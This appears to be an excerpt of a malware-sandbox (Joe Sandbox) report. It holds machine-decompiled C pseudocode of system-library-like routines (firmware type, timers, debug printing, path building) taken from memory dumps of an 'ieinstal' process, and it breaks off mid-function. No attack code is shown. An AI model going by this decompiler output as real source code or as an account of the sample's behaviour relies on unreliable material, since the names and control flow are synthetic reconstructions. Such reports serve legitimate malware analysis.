                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID: `$`
                        • API String ID: 0-197956300
                        • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                        • Instruction ID: 813f24394a8793174d7a9d37d8fdcb3f571b4a531875b52cb3aa929dc4cbfe8c
                        • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                        • Instruction Fuzzy Hash: 3D919EB52043429FE710CE25C941B2BB7E6AF84794F148E2DF995CB2C0E774E904CB62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E1ED851BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                        				signed short* _t63;
                        				signed int _t64;
                        				signed int _t65;
                        				signed int _t67;
                        				intOrPtr _t74;
                        				intOrPtr _t84;
                        				intOrPtr _t88;
                        				intOrPtr _t94;
                        				void* _t100;
                        				void* _t103;
                        				intOrPtr _t105;
                        				signed int _t106;
                        				short* _t108;
                        				signed int _t110;
                        				signed int _t113;
                        				signed int* _t115;
                        				signed short* _t117;
                        				void* _t118;
                        				void* _t119;
                        
                        				_push(0x80);
                        				_push(0x1ede05f0);
                        				E1ED5D0E8(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                        				_t115 =  *(_t118 + 0xc);
                        				 *(_t118 - 0x7c) = _t115;
                        				 *((char*)(_t118 - 0x65)) = 0;
                        				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                        				_t113 = 0;
                        				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                        				 *((intOrPtr*)(_t118 - 4)) = 0;
                        				_t100 = __ecx;
                        				if(_t100 == 0) {
                        					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                        					E1ED1EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        					 *((char*)(_t118 - 0x65)) = 1;
                        					_t63 =  *(_t118 - 0x90);
                        					_t101 = _t63[2];
                        					_t64 =  *_t63 & 0x0000ffff;
                        					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                        					L20:
                        					_t65 = _t64 >> 1;
                        					L21:
                        					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                        					if(_t108 == 0) {
                        						L27:
                        						 *_t115 = _t65 + 1;
                        						_t67 = 0xc0000023;
                        						L28:
                        						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                        						L29:
                        						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                        						E1ED853CA(0);
                        						return E1ED5D130(0, _t113, _t115);
                        					}
                        					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                        						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                        							 *_t108 = 0;
                        						}
                        						goto L27;
                        					}
                        					 *_t115 = _t65;
                        					_t115 = _t65 + _t65;
                        					E1ED4F3E0(_t108, _t101, _t115);
                        					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                        					_t67 = 0;
                        					goto L28;
                        				}
                        				_t103 = _t100 - 1;
                        				if(_t103 == 0) {
                        					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                        					_t74 = E1ED23690(1, _t117, 0x1ece1810, _t118 - 0x74);
                        					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                        					_t101 = _t117[2];
                        					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                        					if(_t74 < 0) {
                        						_t64 =  *_t117 & 0x0000ffff;
                        						_t115 =  *(_t118 - 0x7c);
                        						goto L20;
                        					}
                        					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                        					_t115 =  *(_t118 - 0x7c);
                        					goto L21;
                        				}
                        				if(_t103 == 1) {
                        					_t105 = 4;
                        					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                        					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                        					_push(_t118 - 0x70);
                        					_push(0);
                        					_push(0);
                        					_push(_t105);
                        					_push(_t118 - 0x78);
                        					_push(0x6b);
                        					 *((intOrPtr*)(_t118 - 0x64)) = E1ED4AA90();
                        					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                        					_t113 = L1ED24620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                        					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                        					if(_t113 != 0) {
                        						_push(_t118 - 0x70);
                        						_push( *((intOrPtr*)(_t118 - 0x70)));
                        						_push(_t113);
                        						_push(4);
                        						_push(_t118 - 0x78);
                        						_push(0x6b);
                        						_t84 = E1ED4AA90();
                        						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                        						if(_t84 < 0) {
                        							goto L29;
                        						}
                        						_t110 = 0;
                        						_t106 = 0;
                        						while(1) {
                        							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                        							 *(_t118 - 0x88) = _t106;
                        							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                        								break;
                        							}
                        							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                        							_t106 = _t106 + 1;
                        						}
                        						_t88 = E1ED8500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                        						_t119 = _t119 + 0x1c;
                        						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                        						if(_t88 < 0) {
                        							goto L29;
                        						}
                        						_t101 = _t118 - 0x3c;
                        						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                        						goto L21;
                        					}
                        					_t67 = 0xc0000017;
                        					goto L28;
                        				}
                        				_push(0);
                        				_push(0x20);
                        				_push(_t118 - 0x60);
                        				_push(0x5a);
                        				_t94 = E1ED49860();
                        				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                        				if(_t94 < 0) {
                        					goto L29;
                        				}
                        				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                        					_t101 = L"Legacy";
                        					_push(6);
                        				} else {
                        					_t101 = L"UEFI";
                        					_push(4);
                        				}
                        				_pop(_t65);
                        				goto L21;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: Legacy$UEFI
                        • API String ID: 2994545307-634100481
                        • Opcode ID: 8d3609ac3d9e8da3aa8f41f90b0aa19d4f72f810c8ca156a20bda2a04ddbf35c
                        • Instruction ID: 161c3e70f0c92c1d39b0b726a1542678107cdf42a55e28219d712cc960099405
                        • Opcode Fuzzy Hash: 8d3609ac3d9e8da3aa8f41f90b0aa19d4f72f810c8ca156a20bda2a04ddbf35c
                        • Instruction Fuzzy Hash: BC519BB1E006499FDB14CFA98940FAEBBF9BF58700F50462DE549EB295DB71A900CB20
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 76%
                        			E1ED2B944(signed int* __ecx, char __edx) {
                        				signed int _v8;
                        				signed int _v16;
                        				signed int _v20;
                        				char _v28;
                        				signed int _v32;
                        				char _v36;
                        				signed int _v40;
                        				intOrPtr _v44;
                        				signed int* _v48;
                        				signed int _v52;
                        				signed int _v56;
                        				intOrPtr _v60;
                        				intOrPtr _v64;
                        				intOrPtr _v68;
                        				intOrPtr _v72;
                        				intOrPtr _v76;
                        				char _v77;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr* _t65;
                        				intOrPtr _t67;
                        				intOrPtr _t68;
                        				char* _t73;
                        				intOrPtr _t77;
                        				intOrPtr _t78;
                        				signed int _t82;
                        				intOrPtr _t83;
                        				void* _t87;
                        				char _t88;
                        				intOrPtr* _t89;
                        				intOrPtr _t91;
                        				void* _t97;
                        				intOrPtr _t100;
                        				void* _t102;
                        				void* _t107;
                        				signed int _t108;
                        				intOrPtr* _t112;
                        				void* _t113;
                        				intOrPtr* _t114;
                        				intOrPtr _t115;
                        				intOrPtr _t116;
                        				intOrPtr _t117;
                        				signed int _t118;
                        				void* _t130;
                        
                        				_t120 = (_t118 & 0xfffffff8) - 0x4c;
                        				_v8 =  *0x1edfd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
                        				_t112 = __ecx;
                        				_v77 = __edx;
                        				_v48 = __ecx;
                        				_v28 = 0;
                        				_t5 = _t112 + 0xc; // 0x575651ff
                        				_t105 =  *_t5;
                        				_v20 = 0;
                        				_v16 = 0;
                        				if(_t105 == 0) {
                        					_t50 = _t112 + 4; // 0x5de58b5b
                        					_t60 =  *__ecx |  *_t50;
                        					if(( *__ecx |  *_t50) != 0) {
                        						 *__ecx = 0;
                        						__ecx[1] = 0;
                        						if(E1ED27D50() != 0) {
                        							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        						} else {
                        							_t65 = 0x7ffe0386;
                        						}
                        						if( *_t65 != 0) {
                        							E1EDD8CD6(_t112);
                        						}
                        						_push(0);
                        						_t52 = _t112 + 0x10; // 0x778df98b
                        						_push( *_t52);
                        						_t60 = E1ED49E20();
                        					}
                        					L20:
                        					_pop(_t107);
                        					_pop(_t113);
                        					_pop(_t87);
                        					return E1ED4B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
                        				}
                        				_t8 = _t112 + 8; // 0x8b000cc2
                        				_t67 =  *_t8;
                        				_t88 =  *((intOrPtr*)(_t67 + 0x10));
                        				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
                        				_t108 =  *(_t67 + 0x14);
                        				_t68 =  *((intOrPtr*)(_t105 + 0x14));
                        				_t105 = 0x2710;
                        				asm("sbb eax, edi");
                        				_v44 = _t88;
                        				_v52 = _t108;
                        				_t60 = E1ED4CE00(_t97, _t68, 0x2710, 0);
                        				_v56 = _t60;
                        				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
                        					L3:
                        					 *(_t112 + 0x44) = _t60;
                        					_t105 = _t60 * 0x2710 >> 0x20;
                        					 *_t112 = _t88;
                        					 *(_t112 + 4) = _t108;
                        					_v20 = _t60 * 0x2710;
                        					_v16 = _t60 * 0x2710 >> 0x20;
                        					if(_v77 != 0) {
                        						L16:
                        						_v36 = _t88;
                        						_v32 = _t108;
                        						if(E1ED27D50() != 0) {
                        							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        						} else {
                        							_t73 = 0x7ffe0386;
                        						}
                        						if( *_t73 != 0) {
                        							_t105 = _v40;
                        							E1EDD8F6A(_t112, _v40, _t88, _t108);
                        						}
                        						_push( &_v28);
                        						_push(0);
                        						_push( &_v36);
                        						_t48 = _t112 + 0x10; // 0x778df98b
                        						_push( *_t48);
                        						_t60 = E1ED4AF60();
                        						goto L20;
                        					} else {
                        						_t89 = 0x7ffe03b0;
                        						do {
                        							_t114 = 0x7ffe0010;
                        							do {
                        								_t77 =  *0x1edf8628; // 0x0
                        								_v68 = _t77;
                        								_t78 =  *0x1edf862c; // 0x0
                        								_v64 = _t78;
                        								_v72 =  *_t89;
                        								_v76 =  *((intOrPtr*)(_t89 + 4));
                        								while(1) {
                        									_t105 =  *0x7ffe000c;
                        									_t100 =  *0x7ffe0008;
                        									if(_t105 ==  *_t114) {
                        										goto L8;
                        									}
                        									asm("pause");
                        								}
                        								L8:
                        								_t89 = 0x7ffe03b0;
                        								_t115 =  *0x7ffe03b0;
                        								_t82 =  *0x7FFE03B4;
                        								_v60 = _t115;
                        								_t114 = 0x7ffe0010;
                        								_v56 = _t82;
                        							} while (_v72 != _t115 || _v76 != _t82);
                        							_t83 =  *0x1edf8628; // 0x0
                        							_t116 =  *0x1edf862c; // 0x0
                        							_v76 = _t116;
                        							_t117 = _v68;
                        						} while (_t117 != _t83 || _v64 != _v76);
                        						asm("sbb edx, [esp+0x24]");
                        						_t102 = _t100 - _v60 - _t117;
                        						_t112 = _v48;
                        						_t91 = _v44;
                        						asm("sbb edx, eax");
                        						_t130 = _t105 - _v52;
                        						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                        							_t88 = _t102 - _t91;
                        							asm("sbb edx, edi");
                        							_t108 = _t105;
                        						} else {
                        							_t88 = 0;
                        							_t108 = 0;
                        						}
                        						goto L16;
                        					}
                        				} else {
                        					if( *(_t112 + 0x44) == _t60) {
                        						goto L20;
                        					}
                        					goto L3;
                        				}
                        			}

                        APIs
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1ED2B9A5
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID:
                        • API String ID: 885266447-0
                        • Opcode ID: 7db4384d2cf3d80675a514b0f85abdedb6105a61cfbbc34a42a4608c61f01653
                        • Instruction ID: f3995d264b246d9f8f07a5e9855d670b521fa3bca82562e57558f923f8a06384
                        • Opcode Fuzzy Hash: 7db4384d2cf3d80675a514b0f85abdedb6105a61cfbbc34a42a4608c61f01653
                        • Instruction Fuzzy Hash: E7516B71A18352CFC310CF29C49091AFBE5FB88608F944A6EF9D687344D7B1E844CB92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E1ED0B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                        				signed int _t65;
                        				signed short _t69;
                        				intOrPtr _t70;
                        				signed short _t85;
                        				void* _t86;
                        				signed short _t89;
                        				signed short _t91;
                        				intOrPtr _t92;
                        				intOrPtr _t97;
                        				intOrPtr* _t98;
                        				signed short _t99;
                        				signed short _t101;
                        				void* _t102;
                        				char* _t103;
                        				signed short _t104;
                        				intOrPtr* _t110;
                        				void* _t111;
                        				void* _t114;
                        				intOrPtr* _t115;
                        
                        				_t109 = __esi;
                        				_t108 = __edi;
                        				_t106 = __edx;
                        				_t95 = __ebx;
                        				_push(0x90);
                        				_push(0x1eddf7a8);
                        				E1ED5D0E8(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                        				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                        				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                        				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                        				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                        				if(__edx == 0xffffffff) {
                        					L6:
                        					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                        					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                        					__eflags = _t65 & 0x00000002;
                        					if((_t65 & 0x00000002) != 0) {
                        						L3:
                        						L4:
                        						return E1ED5D130(_t95, _t108, _t109);
                        					}
                        					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                        					_t108 = 0;
                        					_t109 = 0;
                        					_t95 = 0;
                        					__eflags = 0;
                        					while(1) {
                        						__eflags = _t95 - 0x200;
                        						if(_t95 >= 0x200) {
                        							break;
                        						}
                        						E1ED4D000(0x80);
                        						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                        						_t108 = _t115;
                        						_t95 = _t95 - 0xffffff80;
                        						_t17 = _t114 - 4;
                        						 *_t17 =  *(_t114 - 4) & 0x00000000;
                        						__eflags =  *_t17;
                        						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                        						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                        						_t102 = _t110 + 1;
                        						do {
                        							_t85 =  *_t110;
                        							_t110 = _t110 + 1;
                        							__eflags = _t85;
                        						} while (_t85 != 0);
                        						_t111 = _t110 - _t102;
                        						_t21 = _t95 - 1; // -129
                        						_t86 = _t21;
                        						__eflags = _t111 - _t86;
                        						if(_t111 > _t86) {
                        							_t111 = _t86;
                        						}
                        						E1ED4F3E0(_t108, _t106, _t111);
                        						_t115 = _t115 + 0xc;
                        						_t103 = _t111 + _t108;
                        						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                        						_t89 = _t95 - _t111;
                        						__eflags = _t89;
                        						_push(0);
                        						if(_t89 == 0) {
                        							L15:
                        							_t109 = 0xc000000d;
                        							goto L16;
                        						} else {
                        							__eflags = _t89 - 0x7fffffff;
                        							if(_t89 <= 0x7fffffff) {
                        								L16:
                        								 *(_t114 - 0x94) = _t109;
                        								__eflags = _t109;
                        								if(_t109 < 0) {
                        									__eflags = _t89;
                        									if(_t89 != 0) {
                        										 *_t103 = 0;
                        									}
                        									L26:
                        									 *(_t114 - 0xa0) = _t109;
                        									 *(_t114 - 4) = 0xfffffffe;
                        									__eflags = _t109;
                        									if(_t109 >= 0) {
                        										L31:
                        										_t98 = _t108;
                        										_t39 = _t98 + 1; // 0x1
                        										_t106 = _t39;
                        										do {
                        											_t69 =  *_t98;
                        											_t98 = _t98 + 1;
                        											__eflags = _t69;
                        										} while (_t69 != 0);
                        										_t99 = _t98 - _t106;
                        										__eflags = _t99;
                        										L34:
                        										_t70 =  *[fs:0x30];
                        										__eflags =  *((char*)(_t70 + 2));
                        										if( *((char*)(_t70 + 2)) != 0) {
                        											L40:
                        											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                        											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                        											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                        											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                        											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                        											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                        											 *(_t114 - 4) = 1;
                        											_push(_t114 - 0x74);
                        											L1ED5DEF0(_t99, _t106);
                        											 *(_t114 - 4) = 0xfffffffe;
                        											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                        											goto L3;
                        										}
                        										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                        										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                        											goto L40;
                        										}
                        										_push( *((intOrPtr*)(_t114 + 8)));
                        										_push( *((intOrPtr*)(_t114 - 0x9c)));
                        										_push(_t99 & 0x0000ffff);
                        										_push(_t108);
                        										_push(1);
                        										_t101 = E1ED4B280();
                        										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                        										if( *((char*)(_t114 + 0x14)) == 1) {
                        											__eflags = _t101 - 0x80000003;
                        											if(_t101 == 0x80000003) {
                        												E1ED4B7E0(1);
                        												_t101 = 0;
                        												__eflags = 0;
                        											}
                        										}
                        										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                        										goto L4;
                        									}
                        									__eflags = _t109 - 0x80000005;
                        									if(_t109 == 0x80000005) {
                        										continue;
                        									}
                        									break;
                        								}
                        								 *(_t114 - 0x90) = 0;
                        								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                        								_t91 = E1ED4E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                        								_t115 = _t115 + 0x10;
                        								_t104 = _t91;
                        								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                        								__eflags = _t104;
                        								if(_t104 < 0) {
                        									L21:
                        									_t109 = 0x80000005;
                        									 *(_t114 - 0x90) = 0x80000005;
                        									L22:
                        									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                        									L23:
                        									 *(_t114 - 0x94) = _t109;
                        									goto L26;
                        								}
                        								__eflags = _t104 - _t92;
                        								if(__eflags > 0) {
                        									goto L21;
                        								}
                        								if(__eflags == 0) {
                        									goto L22;
                        								}
                        								goto L23;
                        							}
                        							goto L15;
                        						}
                        					}
                        					__eflags = _t109;
                        					if(_t109 >= 0) {
                        						goto L31;
                        					}
                        					__eflags = _t109 - 0x80000005;
                        					if(_t109 != 0x80000005) {
                        						goto L31;
                        					}
                        					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                        					_t38 = _t95 - 1; // -129
                        					_t99 = _t38;
                        					goto L34;
                        				}
                        				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                        					__eflags = __edx - 0x65;
                        					if(__edx != 0x65) {
                        						goto L2;
                        					}
                        					goto L6;
                        				}
                        				L2:
                        				_push( *((intOrPtr*)(_t114 + 8)));
                        				_push(_t106);
                        				if(E1ED4A890() != 0) {
                        					goto L6;
                        				}
                        				goto L3;
                        			}

                        APIs
                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID: _vswprintf_s
                        • String ID:
                        • API String ID: 677850445-0
                        • Opcode ID: ac5c12afe3d0398989555327999ea26c86c37819db9892f76490b0d15a2f6745
                        • Instruction ID: 830468bed9a1c7bda502441075e7b41c22e458eb510301d43f0ee3f38701963b
                        • Opcode Fuzzy Hash: ac5c12afe3d0398989555327999ea26c86c37819db9892f76490b0d15a2f6745
                        • Instruction Fuzzy Hash: 90510675D1029A8FDB25CF74C840BAEBBB2BF08710F2043AED859AB685D7708945CF91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 79%
                        			E1ED32581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
                        				signed int _v8;
                        				signed int _v16;
                        				unsigned int _v24;
                        				void* _v28;
                        				signed int _v32;
                        				unsigned int _v36;
                        				signed int _v37;
                        				signed int _v40;
                        				signed int _v44;
                        				signed int _v48;
                        				signed int _v52;
                        				signed int _v56;
                        				intOrPtr _v60;
                        				signed int _v64;
                        				signed int _v68;
                        				signed int _v72;
                        				signed int _v76;
                        				signed int _v80;
                        				signed int _t230;
                        				signed int _t234;
                        				signed int _t237;
                        				signed int _t243;
                        				signed int _t245;
                        				intOrPtr _t247;
                        				signed int _t250;
                        				signed int _t257;
                        				signed int _t260;
                        				signed int _t268;
                        				signed int _t274;
                        				signed int _t276;
                        				void* _t279;
                        				void* _t283;
                        				signed int _t284;
                        				unsigned int _t287;
                        				signed int _t291;
                        				signed int _t293;
                        				signed int _t297;
                        				intOrPtr _t310;
                        				signed int _t319;
                        				signed int _t321;
                        				signed int _t322;
                        				signed int _t326;
                        				signed int _t327;
                        				void* _t330;
                        				signed int _t331;
                        				signed int _t333;
                        				signed int _t336;
                        				signed int _t337;
                        				void* _t339;
                        
                        				_t333 = _t336;
                        				_t337 = _t336 - 0x4c;
                        				_v8 =  *0x1edfd360 ^ _t333;
                        				_push(__ebx);
                        				_push(__esi);
                        				_push(__edi);
                        				_t326 = 0x1edfb2e8;
                        				_v56 = _a4;
                        				_v48 = __edx;
                        				_v60 = __ecx;
                        				_t287 = 0;
                        				_v80 = 0;
                        				asm("movsd");
                        				_v64 = 0;
                        				_v76 = 0;
                        				_v72 = 0;
                        				asm("movsd");
                        				_v44 = 0;
                        				_v52 = 0;
                        				_v68 = 0;
                        				asm("movsd");
                        				_v32 = 0;
                        				_v36 = 0;
                        				asm("movsd");
                        				_v16 = 0;
                        				_t274 = 0x48;
                        				_t307 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                        				_t319 = 0;
                        				_v37 = _t307;
                        				if(_v48 <= 0) {
                        					L16:
                        					_t45 = _t274 - 0x48; // 0x0
                        					__eflags = _t45 - 0xfffe;
                        					if(_t45 > 0xfffe) {
                        						_t327 = 0xc0000106;
                        						goto L32;
                        					} else {
                        						_t326 = L1ED24620(_t287,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t274);
                        						_v52 = _t326;
                        						__eflags = _t326;
                        						if(_t326 == 0) {
                        							_t327 = 0xc0000017;
                        							goto L32;
                        						} else {
                        							 *(_t326 + 0x44) =  *(_t326 + 0x44) & 0x00000000;
                        							_t50 = _t326 + 0x48; // 0x48
                        							_t321 = _t50;
                        							_t307 = _v32;
                        							 *(_t326 + 0x3c) = _t274;
                        							_t276 = 0;
                        							 *((short*)(_t326 + 0x30)) = _v48;
                        							__eflags = _t307;
                        							if(_t307 != 0) {
                        								 *(_t326 + 0x18) = _t321;
                        								__eflags = _t307 - 0x1edf8478;
                        								 *_t326 = ((0 | _t307 == 0x1edf8478) - 0x00000001 & 0xfffffffb) + 7;
                        								E1ED4F3E0(_t321,  *((intOrPtr*)(_t307 + 4)),  *_t307 & 0x0000ffff);
                        								_t307 = _v32;
                        								_t337 = _t337 + 0xc;
                        								_t276 = 1;
                        								__eflags = _a8;
                        								_t321 = _t321 + (( *_t307 & 0x0000ffff) >> 1) * 2;
                        								if(_a8 != 0) {
                        									_t268 = E1ED939F2(_t321);
                        									_t307 = _v32;
                        									_t321 = _t268;
                        								}
                        							}
                        							_t291 = 0;
                        							_v16 = 0;
                        							__eflags = _v48;
                        							if(_v48 <= 0) {
                        								L31:
                        								_t327 = _v68;
                        								__eflags = 0;
                        								 *((short*)(_t321 - 2)) = 0;
                        								goto L32;
                        							} else {
                        								_t274 = _t326 + _t276 * 4;
                        								_v56 = _t274;
                        								do {
                        									__eflags = _t307;
                        									if(_t307 != 0) {
                        										_t230 =  *(_v60 + _t291 * 4);
                        										__eflags = _t230;
                        										if(_t230 == 0) {
                        											goto L30;
                        										} else {
                        											__eflags = _t230 == 5;
                        											if(_t230 == 5) {
                        												goto L30;
                        											} else {
                        												goto L22;
                        											}
                        										}
                        									} else {
                        										L22:
                        										 *_t274 =  *(_v60 + _t291 * 4);
                        										 *(_t274 + 0x18) = _t321;
                        										_t234 =  *(_v60 + _t291 * 4);
                        										__eflags = _t234 - 8;
                        										if(_t234 > 8) {
                        											goto L56;
                        										} else {
                        											switch( *((intOrPtr*)(_t234 * 4 +  &M1ED32959))) {
                        												case 0:
                        													__ax =  *0x1edf8488;
                        													__eflags = __ax;
                        													if(__ax == 0) {
                        														goto L29;
                        													} else {
                        														__ax & 0x0000ffff = E1ED4F3E0(__edi,  *0x1edf848c, __ax & 0x0000ffff);
                        														__eax =  *0x1edf8488 & 0x0000ffff;
                        														goto L26;
                        													}
                        													goto L108;
                        												case 1:
                        													L45:
                        													E1ED4F3E0(_t321, _v80, _v64);
                        													_t263 = _v64;
                        													goto L26;
                        												case 2:
                        													 *0x1edf8480 & 0x0000ffff = E1ED4F3E0(__edi,  *0x1edf8484,  *0x1edf8480 & 0x0000ffff);
                        													__eax =  *0x1edf8480 & 0x0000ffff;
                        													__eax = ( *0x1edf8480 & 0x0000ffff) >> 1;
                        													__edi = __edi + __eax * 2;
                        													goto L28;
                        												case 3:
                        													__eax = _v44;
                        													__eflags = __eax;
                        													if(__eax == 0) {
                        														goto L29;
                        													} else {
                        														__esi = __eax + __eax;
                        														__eax = E1ED4F3E0(__edi, _v72, __esi);
                        														__edi = __edi + __esi;
                        														__esi = _v52;
                        														goto L27;
                        													}
                        													goto L108;
                        												case 4:
                        													_push(0x2e);
                        													_pop(__eax);
                        													 *(__esi + 0x44) = __edi;
                        													 *__edi = __ax;
                        													__edi = __edi + 4;
                        													_push(0x3b);
                        													_pop(__eax);
                        													 *(__edi - 2) = __ax;
                        													goto L29;
                        												case 5:
                        													__eflags = _v36;
                        													if(_v36 == 0) {
                        														goto L45;
                        													} else {
                        														E1ED4F3E0(_t321, _v76, _v36);
                        														_t263 = _v36;
                        													}
                        													L26:
                        													_t337 = _t337 + 0xc;
                        													_t321 = _t321 + (_t263 >> 1) * 2 + 2;
                        													__eflags = _t321;
                        													L27:
                        													_push(0x3b);
                        													_pop(_t265);
                        													 *((short*)(_t321 - 2)) = _t265;
                        													goto L28;
                        												case 6:
                        													__ebx =  *0x1edf575c;
                        													__eflags = __ebx - 0x1edf575c;
                        													if(__ebx != 0x1edf575c) {
                        														_push(0x3b);
                        														_pop(__esi);
                        														do {
                        															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                        															E1ED4F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
